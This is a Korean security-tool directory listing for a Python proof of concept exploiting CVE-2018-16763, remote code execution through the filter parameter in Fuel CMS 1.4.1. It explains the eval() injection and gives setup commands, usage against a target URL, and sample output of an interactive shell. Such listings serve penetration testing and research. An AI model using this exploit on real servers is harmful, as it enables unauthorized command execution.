Skip to content
KitploitKITPLOIT
도구블로그
제출
도구블로그
제출

해킹, 침투 테스트 및 사이버 보안 도구를 당신의 보안 무기고에!

Kitploit은 해킹, 사이버 보안 및 침투 테스트 도구 디렉토리입니다. 최신 프로젝트 업데이트를 발견하여 취약점을 찾고, 시스템을 분석하고, 테스트를 자동화하고, 보안을 강화하세요.

··피드·문의·개인정보·© 2026 Kitploit

도구 디렉토리

카테고리

모든 카테고리 보기
Loading categories
CVE-2018-16763-Fuel-CMS-1.4.1-Remote-Code-Execution-PoC — Fuel CMS 1.4.1의 `filter` 매개변수를 통한 인증되지 않은 원격 코드 실행을 위한 Python PoC로, 명령 실행을 위한 대화형 셸을 제공합니다. | Kitploit
도구/GitHubGitHub/estebanzarate/cve-2018-16763-fuel-cms-1.4.1-remote-code-execution-poc
Payload GenerationVulnerability AnalysisExploitationWeb Application ExploitationPenetration TestingRemote Access Tool
GitHubestebanzarate/cve-2018-16763-fuel-cms-1.4.1-remote-code-execution-poc

CVE-2018-16763-Fuel-CMS-1.4.1-Remote-Code-Execution-PoC

인기

모두 보기 →

커뮤니티에서 가장 많이 사용되는 도구를 찾아보세요.

모든 도구 탐색

도구 컬렉션을 둘러보세요

모든 도구 보기 →
공유

Fuel CMS 1.4.1의 `filter` 매개변수를 통한 인증되지 않은 원격 코드 실행을 위한 Python PoC로, 명령 실행을 위한 대화형 셸을 제공합니다.

저장소 보기
15개월 전아직 검토되지 않음

CVE-2018-16763 — Fuel CMS 1.4.1 원격 코드 실행 (PoC)

Fuel CMS 1.4.1의 인증되지 않은 RCE 취약점입니다. /fuel/pages/select/ 엔드포인트의 filter 매개변수는 PHP 백엔드의 eval() 호출에 정제되지 않은 채 전달되어, 조작된 페이로드를 통해 임의 코드 실행이 가능합니다. 블라인드 인젝션과 달리 출력은 HTTP 응답에 직접 반영되므로 중간 파일이 필요 없습니다.


작동 원리

  1. /fuel/pages/select/에 특수하게 조작된 filter 페이로드를 포함한 GET 요청을 전송하여 PHP의 system()을 원하는 명령으로 호출합니다.
  2. 정규식 패턴을 사용하여 HTTP 응답에서 반영된 출력을 파싱합니다.
  3. 명령 출력을 인터랙티브 셸에 직접 반환합니다.

요구 사항

  • Python 3
  • 의존성 설치:
root@kitploit:~
python3 -m venv venv
source venv/bin/activate
python3 -m pip install requests prompt_toolkit

사용법

root@kitploit:~
python3 exploit.py -t http://TARGET

예시:

root@kitploit:~
$ python3 exploit.py -t http://10.10.10.10
[*] Testing command execution...
[+] Target is vulnerable! Output: uid=33(www-data) gid=33(www-data) groups=33(www-data)
[+] Shell opened. Type 'exit' or Ctrl+C to quit.
Shell> whoami
www-data
Shell> hostname
fuel-cms
Shell> exit

참고 자료

  • CVE-2018-16763
  • EDB-47138

크레딧

  • 발견 및 원본 익스플로잇: Syed Sheeraz Ali
  • 정리 및 인터랙티브 셸: Esteban Zárate
도구 다운로드